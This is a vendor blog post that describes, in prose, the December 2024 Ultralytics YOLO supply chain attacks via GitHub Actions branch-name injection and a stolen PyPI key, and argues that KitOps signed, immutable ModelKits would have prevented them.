How KitOps Would Have Prevented the YOLO Supply Chain Attacks
...and how to protect your organization today
In December 2024, the Ultralytics YOLO models were hit by not one but two sophisticated supply chain attacks. Given that YOLO is the most popular computer vision model, it’s unsurprising that these attacks impacted hundreds of thousands of users - from enterprises, to governments, to researchers and hobbyists. Many of these users unknowingly ran cryptomining software (attack #1), and could even have had data stolen (attack #2).
Both incidents exploited weaknesses that exist in almost every AI/ML packaging pipeline today - whether in the cloud or on-premises.
The good news is that it’s easy to protect yourself - these attacks would have been prevented with the KitOps open source AI/ML packaging standard (https://kitops.org/).
This article will walk you through how those attacks happened, and why immutable packaging for AI/ML projects would have blocked both attacks at multiple layers (using defence-in-depth to avoid AI/ML supply chain attacks).
How the Ultralytics YOLO Supply Chain was Compromised...Twice
Attack 1: CI/CD Injection via GitHub Actions
The first attack targeted Ultralytics’ GitHub Actions build pipeline:
Attackers submitted malicious pull requests containing branch names with embedded shell commands.
GitHub Actions workflow parsed branch names unsafely, allowing the shell commands to execute during the build.
Attackers’ shell commands injected malicious code into the built artifacts that would download and run a cryptocurrency miner when installed by a user.
Compromised versions (8.3.41 and 8.3.42) were automatically published to PyPI as the last step of the GitHub Actions workflow - those builds looked legitimate to unsuspecting users.
Attack 2: PyPI API Key Compromise
After the first breach was discovered, Ultralytics created a clean release (8.3.43) and posted it. Unfortunately the attackers had obtained Ultralytics own API credentials for the repository where their builds were distributed.
Using these credentials, the attackers uploaded two newer (and even more malicious) versions (8.3.45 and 8.3.46) to Ultralytics repository.
These new versions went further than their first attack - adding data exfiltration code in addition to the previous cryptocurrency miner.
Once again, users downloaded these new versions believing they were safe (they appeared to have been uploaded by Ultralytics after all!), exposing them to potential data theft.
The Core Problems: Mutable Packages, and Implicit Trust
These attacks succeeded even after the original attack had been found because they used producers and consumers normal assumptions:
New versions are trustworthy by default.
The publisher has full, persistent write access.
CI/CD pipelines directly push packages without immutable build guarantees.
These assumptions aren’t unique to PyPI, they’re true of nearly any pipeline, repository, and distribution mechanism.
By getting inside the trusted supply chain and publishing flow, the attacker can ship anything.
This is frightening for two reasons:
AI/ML projects can’t be built without multiple pipelines and an often lengthy supply chain.
AI/ML supply chains are not only vulnerable to attack, but also to human error - both can introduce vulnerabilities that can irreparably damage a brand.
Where KitOps Breaks the Attack Chain
KitOps is designed from the ground up to secure the AI/ML supply chain by replacing mutable package publishing with immutable ModelKits as OCI Artifacts.
Here’s how KitOps ModelKits would have stopped these attacks.
Fix: Immutable Artifacts
Every ModelKit (and each layer inside the ModelKit) is addressed with a unique cryptographic digest (SHA256). Once a ModelKit is built and pushed, it *can’t* be overwritten or modified.
Once the attacker inserted malicious code into the source files, those layers of the KitOps ModelKit would have new digests. A simple check for mismatching digests would have highlighted the unexpected change and the pipeline would have been stopped before publishing.
Result: ModelKits immutability would have made it impossible to hide the malicious code changes.
Fix: Detached Build & Publish
KitOps decouples build and publish - both can still be automated but they are broken into two distinct steps allowing machines or humans to react to unexpected situations before they are exposed to the world.
With KitOps builds happen in isolated environments, with only the immutable ModelKit being pushed to the registry. A delivery pipeline can then check that the cryptographic digest of each file in the ModelKit matches the original digests.
Result: The results of the compromised GitHub Action would have been detected when they were pushed to the internal registry, before they were distributed to the public.
Fix: Cryptographic Signing
ModelKits can (and should) be signed with publisher keys. This allows consumers to independently verify that the artifact and publisher identity can be trusted.
This is explicit trust that relies on cryptographic signatures, not something easy to spoof like a publisher’s repository name.
Result: Even if attackers obtained Ultralytics API credentials, they could not sign artifacts as Ultralytics without the private key. Users would have been able to quickly verify that the malicious versions had been posted by an entity that was not Ultralytics.
Fix: Policy-Based Distribution
ModelKits use the existing OCI standard which means that the same tools that are used for policy enforcement of containers can be used to enforce policies with ModelKits. For example, a policy may say that only signed, verified, and pre-approved artifacts can be delivered to production or public environments.
Result: Even if a malicious artifact made it to the registry, policy engines would have prevented its deployment and public users wouldn’t have been impacted.
TL;DR: The Attacks Would Have Failed
The injected code from both attacks would have been detected immediately, before it was distributed to the public.
Using signed artifacts for distribution would have highlighted that the malicious versions posted in the second attack were not from a trusted Ultralytics source.
A policy check in the distribution pipeline would have blocked any artifacts that did not match their source material or were improperly signed.
Users would never have even been exposed to the malicious versions. This attack would have been detected and dealt with internally, saving users from pain, and saving the Ultralytics reputation from damage.
These Attacks are Just the Beginning
These kinds of attacks aren’t theoretical anymore. Ultralytics is only the most recent, high-profile example. CI/CD compromise, credential theft, and poisoned public package repositories are now routine in AI/ML:
In Feb 2024 over 100 models on Hugging Face opened backdoors to users' computers
In Feb 2025 ReversingLabs identified an attack called NullifAI using the common Pickle file serialization format
If you want to protect your customers and your brand you can build KitOps ModelKits into your existing workflows and pipelines using our SDK or CLI, and host ModelKits on a private Jozu Hub behind your firewall.
Learn more at: